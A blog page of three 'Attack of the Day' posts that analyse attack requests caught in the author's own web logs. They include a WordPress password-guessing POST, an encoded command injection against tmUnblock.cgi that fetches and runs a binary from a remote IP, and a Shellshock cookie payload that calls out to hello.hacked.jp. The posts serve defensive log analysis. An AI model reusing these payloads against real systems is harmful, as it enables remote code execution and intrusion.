Whoops! They did it again.

Posted Posted in Attack of the Day

This person looks like they may have purchased some tools from someone and didn’t fully comprehend what it took to configure things.  Maybe they thought tools.ua.random was a real user-agent?  Who knows.. POST User-Agent: [% tools.ua.random() %] Connection: close Content-Length: 115 Host: www.planetspork.com Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://www.planetspork.com/w/wp-login.php X-Forwarded-For: 31.193.192.184 log=admin&pwd=scooby&wp-submit=Log%20In&redirect_to=http%3A%2F%2Fwww.planetspork.com%2Fw%2Fwp-admin%2F&testcookie=1 Two points for password creativity although I’m more of a Shaggy fan, really..

Say What You Mean

Posted Posted in Attack of the Day

** Standard Warnings Apply ** Let me help you understand.. This showed up in the logs today as a curious request.  Not much more than an exceedingly long encoded request, but a good example of why string normalization is a useful feature in a WebApp firewall. POST /tmUnblock.cgi HTTP/1.1 content-length: 1030 X-Forwarded-For: 200.29.229.3 %73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e%3d&%61%63%74%69%6f%6e%3d&%63%6f%6d%6d%69%74%3d&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74%6d%70%3b%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%2e%30%37%34%30%35%63%33%36%2e%73%68%3b%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%2e%30%37%34%30%35%63%33%36%20%68%74%74%70%3a%2f%2f%32%30%30%2e%32%39%2e%32%32%39%2e%33%3a%33%32%30%30%22%20%3e%3e%20%2e%30%37%34%30%35%63%33%36%2e%73%68%3b%65%63%68%6f%20%22%63%68%6d%6f%64%20%2b%78%20%2e%30%37%34%30%35%63%33%36%22%20%3e%3e%20%2e%30%37%34%30%35%63%33%36%2e%73%68%3b%65%63%68%6f%20%22%2e%2f%2e%30%37%34%30%35%63%33%36%22%20%3e%3e%20%2e%30%37%34%30%35%63%33%36%2e%73%68%3b%65%63%68%6f%20%22%72%6d%20%2e%30%37%34%30%35%63%33%36%22%20%3e%3e%20%2e%30%37%34%30%35%63%33%36%2e%73%68%3b%63%68%6d%6f%64%20%2b%78%20%2e%30%37%34%30%35%63%33%36%2e%73%68%3b%2e%2f%2e%30%37%34%30%35%63%33%36%2e%73%68%60&%53%74%61%72%74%45%50%49%3d%31 Since this request used characters besides %20, I couldn’t immediately look at it to determine what they wanted..  They would have been more successful asking me in English, but I digress.  A quick decode shows they actually wanted to […]

Clever Domain Name

Posted Leave a commentPosted in Attack of the Day

Saw this get flagged on Friday.  The domain “hacked.jp” showing up in a questionable HTTP request kind of indicates the owner really thought through their plans. GET /cgi-sys/entropysearch.cgi HTTP/1.1 Content-Type: text/html Cookie: () { x;};echo;/bin/bash -c “php -r \”file_get_contents(‘http://hello.hacked.jp/hello/?l=planetspork.com’);\”” Host: planetspork.com Accept: text/html, */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19 X-Forwarded-For: 77.79.40.195 A guy might be curious what lived at hello.hacked.jp, I know I was. Lappy486:arf imhoff$ telnet hello.hacked.jp 80 Trying 31.184.192.233… Connected to hello.hacked.jp. Escape character is ‘^]’. GET /hello/?l=planetspork.com HTTP/1.0 HTTP/1.1 […]